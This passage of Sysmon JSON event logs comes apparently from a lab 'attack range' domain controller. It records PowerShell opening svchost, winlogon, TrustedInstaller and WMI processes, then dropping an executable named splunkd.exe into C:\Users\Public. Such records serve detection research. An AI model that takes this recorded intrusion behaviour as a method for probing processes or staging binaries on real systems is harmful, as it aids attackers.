6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFF44CB3F41)","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1117,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:36.938\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-001034380100}\r\nSourceProcessId: 2096\r\nSourceThreadId: 2796\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFF44CB3F41)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:36.938","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-001034380100}","SourceProcessId":"2096","SourceThreadId":"2796","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFF44CB3F41)","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1118,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:36.938\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-001034380100}\r\nSourceProcessId: 2096\r\nSourceThreadId: 2796\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010A4F00000}\r\nTargetProcessId: 1592\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFF44CB3F41)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:36.938","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-001034380100}","SourceProcessId":"2096","SourceThreadId":"2796","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010A4F00000}","TargetProcessId":"1592","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFF44CB3F41)","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1119,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:36.938\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-001034380100}\r\nSourceProcessId: 2096\r\nSourceThreadId: 2796\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-001058000100}\r\nTargetProcessId: 1840\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFF44CB3F41)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:36.938","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-001034380100}","SourceProcessId":"2096","SourceThreadId":"2796","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-001058000100}","TargetProcessId":"1840","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFF44CB3F41)","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1120,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:36.938\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-001034380100}\r\nSourceProcessId: 2096\r\nSourceThreadId: 2796\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {A837DB8D-01B6-5F25-0000-00101A7C0100}\r\nTargetProcessId: 2352\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFF44CB3F41)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:36.938","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-001034380100}","SourceProcessId":"2096","SourceThreadId":"2796","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{A837DB8D-01B6-5F25-0000-00101A7C0100}","TargetProcessId":"2352","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFF44CB3F41)","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1121,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:36.938\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-001034380100}\r\nSourceProcessId: 2096\r\nSourceThreadId: 2796\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {A837DB8D-01BB-5F25-0000-0010C76E0200}\r\nTargetProcessId: 3008\r\nTargetImage: C:\\Windows\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3801_none_7ed07ae422175cd5\\TiWorker.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFF44CB3F41)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:36.938","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-001034380100}","SourceProcessId":"2096","SourceThreadId":"2796","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{A837DB8D-01BB-5F25-0000-0010C76E0200}","TargetProcessId":"3008","TargetImage":"C:\\Windows\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3801_none_7ed07ae422175cd5\\TiWorker.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFF44CB3F41)","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1122,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:36.938\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-001034380100}\r\nSourceProcessId: 2096\r\nSourceThreadId: 2796\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {A837DB8D-01BB-5F25-0000-00100E6D0200}\r\nTargetProcessId: 2968\r\nTargetImage: C:\\Windows\\servicing\\TrustedInstaller.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFF44CB3F41)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:36.938","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-001034380100}","SourceProcessId":"2096","SourceThreadId":"2796","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{A837DB8D-01BB-5F25-0000-00100E6D0200}","TargetProcessId":"2968","TargetImage":"C:\\Windows\\servicing\\TrustedInstaller.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFF44CB3F41)","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1123,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:36.938\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-001034380100}\r\nSourceProcessId: 2096\r\nSourceThreadId: 2796\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {A837DB8D-01B3-5F25-0000-0010104A0000}\r\nTargetProcessId: 784\r\nTargetImage: C:\\Windows\\system32\\winlogon.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFF44CB3F41)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:36.938","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-001034380100}","SourceProcessId":"2096","SourceThreadId":"2796","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{A837DB8D-01B3-5F25-0000-0010104A0000}","TargetProcessId":"784","TargetImage":"C:\\Windows\\system32\\winlogon.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFF44CB3F41)","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1124,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:36.938\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-001034380100}\r\nSourceProcessId: 2096\r\nSourceThreadId: 2796\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {A837DB8D-01B9-5F25-0000-001012B90100}\r\nTargetProcessId: 2816\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFF44CB3F41)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:36.938","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-001034380100}","SourceProcessId":"2096","SourceThreadId":"2796","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{A837DB8D-01B9-5F25-0000-001012B90100}","TargetProcessId":"2816","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFF44CB3F41)","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":1125,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: EXE\r\nUtcTime: 2020-08-01 05:46:36.953\r\nProcessGuid: {A837DB8D-01B5-5F25-0000-001034380100}\r\nProcessId: 2096\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Public\\splunkd.exe\r\nCreationUtcTime: 2020-08-01 05:45:35.287","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"EXE","UtcTime":"2020-08-01 05:46:36.953","ProcessGuid":"{A837DB8D-01B5-5F25-0000-001034380100}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Public\\splunkd.exe","CreationUtcTime":"2020-08-01 05:45:35.287","EventReceivedTime":"2020-08-01 